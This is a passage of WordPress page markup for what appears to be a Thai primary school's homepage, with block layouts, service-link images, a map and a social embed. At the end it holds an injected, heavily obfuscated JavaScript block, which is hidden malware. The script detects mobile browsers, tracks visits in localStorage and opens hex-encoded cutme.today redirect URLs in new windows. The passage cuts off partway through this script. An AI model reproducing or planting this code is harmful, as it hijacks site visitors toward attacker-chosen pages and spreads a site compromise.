\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingHoverColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingHoverColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_bd7bab-81\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_a02c00-db\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_a02c00-db\"><div class=\"kt-inside-inner-col\"><!-- wp:kadence/tabs {\"uniqueID\":\"14_8cac31-6c\",\"tabCount\":2,\"contentBgColor\":\"rgba(171,184,195,0.02)\",\"contentBorderStyles\":[{\"top\":[\"#bcbcbc\",\"\",1],\"right\":[\"#bcbcbc\",\"\",1],\"bottom\":[\"#bcbcbc\",\"\",1],\"left\":[\"#bcbcbc\",\"\",1],\"unit\":\"px\"}],\"tabAlignment\":\"center\",\"titles\":[{\"text\":\"E-SERVICE\",\"icon\":\"fe_box\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"เมนูระบบบริการ\",\"icon\":\"fe_airplay\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"}],\"titleColor\":\"#000000\",\"titleColorHover\":\"#f78da7\",\"titleColorActive\":\"#ff6900\",\"titleBg\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"titleBgHover\":\"#ffffff\",\"titleBgActive\":\"#ffffff\",\"titleBorder\":\"#ffffff\",\"titleBorderHover\":\"#8ed1fc\",\"titleBorderActive\":\"#8ed1fc\",\"titleBorderWidth\":[1,1,0,1],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,-1,0],\"size\":\"1.299\",\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"tabSize\":\"\",\"mobileSize\":\"\",\"fontWeight\":\"400\",\"widthType\":\"percent\",\"tabWidth\":[3,\"\",\"\"],\"gutter\":[0,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id14_8cac31-6c kt-tabs-has-2-tabs kt-active-tab-1 kt-tabs-layout-tabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-center \"><ul class=\"kt-tabs-title-list kb-tabs-list-columns kb-tab-title-columns-3\"><li id=\"tab-e-service\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-active\"><a href=\"#tab-e-service\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span data-name=\"fe_box\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">E-SERVICE</span></a></li><li id=\"tab-\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-inactive\"><a href=\"#tab-\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span data-name=\"fe_airplay\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">เมนูระบบบริการ</span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"48d9e9-20\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tab48d9e9-20\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":723,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1623\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ย้าย.png\" alt=\"\" class=\"wp-image-723\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1608,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=563\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/comment.png\" alt=\"\" class=\"wp-image-1608\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":724,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=741\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ดูเกรด.png\" alt=\"\" class=\"wp-image-724\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1606,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=484\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/6.png\" alt=\"\" class=\"wp-image-1606\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":725,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ห้องประชุม.png\" alt=\"\" class=\"wp-image-725\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1604,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1611\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/5-1.png\" alt=\"\" class=\"wp-image-1604\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"6fe435-37\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-tab6fe435-37\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":726,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://slp.ssk.in.th/slweb/\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/SLIP-SSK-1.webp\" alt=\"\" class=\"wp-image-726\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":729,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=748\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/2-1.png\" alt=\"\" class=\"wp-image-729\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":808,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=810\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/คู่มือ.png\" alt=\"\" class=\"wp-image-808\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":727,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/smss/index.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/smss-ssk1.webp\" alt=\"\" class=\"wp-image-727\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":730,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/5.png\" alt=\"\" class=\"wp-image-730\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":728,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/admss.webp\" alt=\"\" class=\"wp-image-728\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":731,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/6.png\" alt=\"\" class=\"wp-image-731\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs -->\n\n<!-- wp:loginout /-->\n\n<!-- wp:embed {\"url\":\"https://www.canva.com/design/DAGsFHWqrOk/eCZISZCLZjZV8cpVDnNIUA/view\",\"type\":\"rich\",\"providerNameSlug\":\"canva\",\"align\":\"right\"} -->\n<figure class=\"wp-block-embed alignright is-type-rich is-provider-canva wp-block-embed-canva\"><div class=\"wp-block-embed__wrapper\">\nhttps://www.canva.com/design/DAGsFHWqrOk/eCZISZCLZjZV8cpVDnNIUA/view\n</div></figure>\n<!-- /wp:embed -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"d3f1e2c8\",\"isDynamic\":true,\"blockVersion\":4} /--></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":3,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:paragraph {\"align\":\"center\",\"backgroundColor\":\"cyan-bluish-gray\",\"fontSize\":\"medium\"} -->\n<p class=\"has-text-align-center has-cyan-bluish-gray-background-color has-background has-medium-font-size\"><strong>แผนที่/ที่ตั้ง</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:image {\"id\":686,\"width\":\"auto\",\"height\":\"500px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Yellow-Clean-Contact-Us-Instagram-Post.png\" alt=\"\" class=\"wp-image-686\" style=\"aspect-ratio:1;object-fit:cover;width:auto;height:500px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n\n<!-- wp:shortcode -->\n[post-views]\n<!-- /wp:shortcode -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"fc945863\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const 